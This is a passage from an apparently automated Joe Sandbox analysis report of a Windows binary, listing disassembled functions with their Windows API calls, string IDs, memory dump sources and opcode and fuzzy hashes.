                                                                  • Opcode Fuzzy Hash: 7898ed8a1cf907c82829a5b18767c31c40bed6bdec75e5ef7ea60eb770ef7d09
                                                                  • Instruction Fuzzy Hash: 09E01AB4C00205DFCB41AFA0D908A5DBBB2EB08310F108559E84AE7250E73959829F10
                                                                  Function 0067EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 0067EC4A
                                                                  • GetDC.USER32(00000000), ref: 0067EC54
                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0067EC60
                                                                  • ReleaseDC.USER32(?), ref: 0067EC81
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: c79f08e87374c6e769f62356d1ed7edfc8334f489cc73e01120c0e2a0cdc5f18
                                                                  • Instruction ID: 5792b2415482532c9cca2ab148ed072ffc32669c770fa0bb15d4ca7056a342e7
                                                                  • Opcode Fuzzy Hash: c79f08e87374c6e769f62356d1ed7edfc8334f489cc73e01120c0e2a0cdc5f18
                                                                  • Instruction Fuzzy Hash: 36E01AB0C00205DFCB409FA0D808A5DBBB2EB08310F108519E849E7250E73959419F10
                                                                  Function 00673616 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString
                                                                  • String ID: @COM_EVENTOBJ$bnh
                                                                  • API String ID: 2948472770-1815434238
                                                                  • Opcode ID: 01ebf2efbe60ec01c8728adbce4d6e5bacf77ed606c066b3eaff6c20656bd90d
                                                                  • Instruction ID: 8533dcf5e2447df69ef55d7106fb3621979caadb42defd68c9fdc6095892a7ae
                                                                  • Opcode Fuzzy Hash: 01ebf2efbe60ec01c8728adbce4d6e5bacf77ed606c066b3eaff6c20656bd90d
                                                                  • Instruction Fuzzy Hash: 2FF1AD70A087209FD724DF14C881BAAB7E2BF84704F24891DF58A9B361D771EA45DB86
                                                                  Function 006A85DB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 006405B2: EnterCriticalSection.KERNEL32(006F170C,?,00000000,?,0062D22A,006F3570,00000001,00000000,?,?,0069F023,?,?,00000000,00000001,?), ref: 006405BD
                                                                    • Part of subcall function 006405B2: LeaveCriticalSection.KERNEL32(006F170C,?,0062D22A,006F3570,00000001,00000000,?,?,0069F023,?,?,00000000,00000001,?,00000001,006F2430), ref: 006405FA
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 00640413: __onexit.LIBCMT ref: 00640419
                                                                  • __Init_thread_footer.LIBCMT ref: 006A8658
                                                                    • Part of subcall function 00640568: EnterCriticalSection.KERNEL32(006F170C,00000000,?,0062D258,006F3570,006627C9,00000001,00000000,?,?,0069F023,?,?,00000000,00000001,?), ref: 00640572
                                                                    • Part of subcall function 00640568: LeaveCriticalSection.KERNEL32(006F170C,?,0062D258,006F3570,006627C9,00000001,00000000,?,?,0069F023,?,?,00000000,00000001,?,00000001), ref: 006405A5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                  • String ID: Variable must be of type 'Object'.$bnh
                                                                  • API String ID: 535116098-1046365367
                                                                  • Opcode ID: a8d134a8fd193a395b744c21457defebc239fa5f93a13ba6ba5b0e1f94f5a3ef
                                                                  • Instruction ID: ef2c9fd627f9a9e0b0a3127e2cb98c35ed0004ca13f4a73e1157f57912250c81
                                                                  • Opcode Fuzzy Hash: a8d134a8fd193a395b744c21457defebc239fa5f93a13ba6ba5b0e1f94f5a3ef
                                                                  • Instruction Fuzzy Hash: A3913574A00208AFDB04EF94D9919ADBBB6EF4A300F14805DF906AB392DB71AE45CF54
                                                                  Function 006957CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 006241EA: _wcslen.LIBCMT ref: 006241EF
                                                                  • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00695919
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Connection_wcslen
                                                                  • String ID: *$LPT
                                                                  • API String ID: 1725874428-3443410124
                                                                  • Opcode ID: 7580b903af8b49f6fa557f37725250bf3bc10069367a26239b135f1498f2d1a5
                                                                  • Instruction ID: e21dd81245ff5591b6a6b260197c18b9034ad5727ed4aeab0ebbf8397e27f8af
                                                                  • Opcode Fuzzy Hash: 7580b903af8b49f6fa557f37725250bf3bc10069367a26239b135f1498f2d1a5
                                                                  • Instruction Fuzzy Hash: 7E91AF75A00614DFDB15DF54C4C4EAABBF6AF44304F198099E84A9F762C731EE86CB90
                                                                  Function 00685703 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 223comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 006858AF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ContainedObject
                                                                  • String ID: 0$o$Container
                                                                  • API String ID: 3565006973-905637992
                                                                  • Opcode ID: fd89cf3b5e88b47e273f223ee50dbee16f668ba274610ce9b843df3a43765900
                                                                  • Instruction ID: b159c64486362772422434bd3be60f0a10d65c25f3bdea0b896cb3ace831fe76
                                                                  • Opcode Fuzzy Hash: fd89cf3b5e88b47e273f223ee50dbee16f668ba274610ce9b843df3a43765900
                                                                  • Instruction Fuzzy Hash: A8813870600601EFDB54DF54C884A6ABBFAFF48715F10866EF94A8B2A1DBB0E841CB50
                                                                  Function 0064E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 0064E67D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHandling__start
                                                                  • String ID: pow
                                                                  • API String ID: 3213639722-2276729525
                                                                  • Opcode ID: fcabdf1287225b26aedd64e2179a7396a3ce0a767cecb18b9f076266247b40bd
                                                                  • Instruction ID: 43021f209d6edefc32b934da6e8376c20e4851e1ba7a20c6b6e76f92530f9523
                                                                  • Opcode Fuzzy Hash: fcabdf1287225b26aedd64e2179a7396a3ce0a767cecb18b9f076266247b40bd
                                                                  • Instruction Fuzzy Hash: 51517A61E085038AC7217714CD017FA2BA3BB20752F208D58F8D5537E8DF368D9A9B4A
                                                                  Function 0063A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #
                                                                  • API String ID: 0-1885708031
                                                                  • Opcode ID: 46ec0164dd7fb0e7d59b1773a13a17ff5304e69819f526f170fcd8896dc35429
                                                                  • Instruction ID: d1918fdc135520552c8b5f10e337bf83c5595c80e1fe5d0b1054990373efcbee
                                                                  • Opcode Fuzzy Hash: 46ec0164dd7fb0e7d59b1773a13a17ff5304e69819f526f170fcd8896dc35429
                                                                  • Instruction Fuzzy Hash: 57514331544246DFDB25DF68C449AFA7BA2EF15320F248059F895AB3D0DB709D82CBA1
                                                                  Function 0063F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000), ref: 0063F6DB
                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0063F6F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemorySleepStatus
                                                                  • String ID: @
                                                                  • API String ID: 2783356886-2766056989
                                                                  • Opcode ID: 6d553f1667870fde8ec676e76ee810754f8928b2229e98a9c20b03c746c6bdf9
                                                                  • Instruction ID: c1c80d56711baf046cf7b9482a071cad57eeb2deb60fe7c56a8d4664a84bcc6c
                                                                  • Opcode Fuzzy Hash: 6d553f1667870fde8ec676e76ee810754f8928b2229e98a9c20b03c746c6bdf9
                                                                  • Instruction Fuzzy Hash: FF516971809B599FD360AF14EC86BABB7F9FB94300F81885DF1D942191DF318528CB2A
                                                                  Function 006B4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 006B40BD
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 006B40F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$DestroyMove
                                                                  • String ID: static
                                                                  • API String ID: 2139405536-2160076837
                                                                  • Opcode ID: 5f3338b41f5c7b2a2d9811d17a7d6ad4839679cf34a68caeb0ab95aca3c62f1b
                                                                  • Instruction ID: acb282a6793e2c7ec0231e68cbb584f2b0c8e160811d833849fc4c8808084265
                                                                  • Opcode Fuzzy Hash: 5f3338b41f5c7b2a2d9811d17a7d6ad4839679cf34a68caeb0ab95aca3c62f1b
                                                                  • Instruction Fuzzy Hash: 83318DB1100604AADB209F68CC80EFB77AAFF48764F00861DF9A587291DA71AC81CB64
                                                                  Function 006B4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 006B50BD
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006B50D2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: '
                                                                  • API String ID: 3850602802-1997036262
                                                                  • Opcode ID: f5809c5dace2cb2275532edbdcf71f7ba6de2aadb377bde98db667bc6569f45e
                                                                  • Instruction ID: 1894c16a4845929912aeb929bf10e1cac7168621f215e63f585c2f39fc58534c
                                                                  • Opcode Fuzzy Hash: f5809c5dace2cb2275532edbdcf71f7ba6de2aadb377bde98db667bc6569f45e
                                                                  • Instruction Fuzzy Hash: AF312AB4A0170A9FDB14DF69C891BEE7BB6FF49300F10406AE905AB351D771A985CF90
                                                                  Function 006220B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                    • Part of subcall function 00622234: GetWindowLongW.USER32(?,000000EB), ref: 00622242
                                                                  • GetParent.USER32(?), ref: 00663440
                                                                  • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 006634CA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$ParentProc
                                                                  • String ID: (o
                                                                  • API String ID: 2181805148-1684096767
                                                                  • Opcode ID: 581bd5629f2d701b8432d394fec20cd4cbf211f033b0afcab0077056470f929e
                                                                  • Instruction ID: 3e8f825e634272a2ae5debd3e891ee6f42904965eba095e4ef5bc5c5dd74fbcc
                                                                  • Opcode Fuzzy Hash: 581bd5629f2d701b8432d394fec20cd4cbf211f033b0afcab0077056470f929e
                                                                  • Instruction Fuzzy Hash: 72219E30201565BFCB269F68D869DF93BA7EF06360F144244F7250B3E2D7318EA6DA10
                                                                  Function 006B41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00627873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006278B1
                                                                    • Part of subcall function 00627873: GetStockObject.GDI32(00000011), ref: 006278C5
                                                                    • Part of subcall function 00627873: SendMessageW.USER32(00000000,00000030,00000000), ref: 006278CF
                                                                  • GetWindowRect.USER32(00000000,?), ref: 006B4216
                                                                  • GetSysColor.USER32(00000012), ref: 006B4230
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                  • String ID: static
                                                                  • API String ID: 1983116058-2160076837
                                                                  • Opcode ID: f767c2c6fd305d2ece6f065a803bfdae782005171d0889e5074e51d59b86bfb9
                                                                  • Instruction ID: 882de49da78221a8f7034fc6015be6be7ce6f947d053196a1d531d3a7ccd8ed7
                                                                  • Opcode Fuzzy Hash: f767c2c6fd305d2ece6f065a803bfdae782005171d0889e5074e51d59b86bfb9
                                                                  • Instruction Fuzzy Hash: 8A1129B2610209AFDB00DFA8CC45AFA7BA9EF08354F014524F955D7251EA34E891EB50
                                                                  Function 0069D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0069D7C2
                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0069D7EB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$OpenOption
                                                                  • String ID: <local>
                                                                  • API String ID: 942729171-4266983199
                                                                  • Opcode ID: ec15cff93cd1a98829a7394d80d15c6415979c3e18948450926cb9043e8d53d9
                                                                  • Instruction ID: 1f564e682610eeb40c308d09f95156a9fa007dbde698d02eb31188006031b5f6
                                                                  • Opcode Fuzzy Hash: ec15cff93cd1a98829a7394d80d15c6415979c3e18948450926cb9043e8d53d9
                                                                  • Instruction Fuzzy Hash: 8C110C7110523279DF344BE68C85EF7BE5EEF127A4F104236F5099B680D6749841D6F0
                                                                  Function 006875ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                  • CharUpperBuffW.USER32(?,?,?), ref: 0068761D
                                                                  • _wcslen.LIBCMT ref: 00687629
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$BuffCharUpper
                                                                  • String ID: STOP
                                                                  • API String ID: 1256254125-2411985666
                                                                  • Opcode ID: 5384e169d4a77637c48d6f3bf1b52e1b47adf714e28dfce05f49cb895fa9e77b
                                                                  • Instruction ID: 236bf97fad2f30882f0ba9fdf04e98c4ec9df146c717b0ba9b729c29444181b3
                                                                  • Opcode Fuzzy Hash: 5384e169d4a77637c48d6f3bf1b52e1b47adf714e28dfce05f49cb895fa9e77b
                                                                  • Instruction Fuzzy Hash: 97018432A149268BCB10BEBDEC519FF77B7AF617507600728E42596291FB31D980D790
                                                                  Function 0068262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00684620
                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00682699
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 624084870-1403004172
                                                                  • Opcode ID: d0e9a29a0d08b46007c84af1e7f78396590fdc6bb57d3fe9435861cb54b67b9f
                                                                  • Instruction ID: c2a39401f25818828923ebd4053ca61019b0f6e27ef64b5680071d6a885cb7b9
                                                                  • Opcode Fuzzy Hash: d0e9a29a0d08b46007c84af1e7f78396590fdc6bb57d3fe9435861cb54b67b9f
                                                                  • Instruction Fuzzy Hash: 2801F175641226ABCB04FBA0CC61CFE336AEF46360B000B1DB832A73C1EA3158088B54
                                                                  Function 00682525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00684620
                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00682593
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 624084870-1403004172
                                                                  • Opcode ID: 03a05cd7ed26da5f42f9ac811281a39f178d5b8e4df78255d685f3138148f3d4
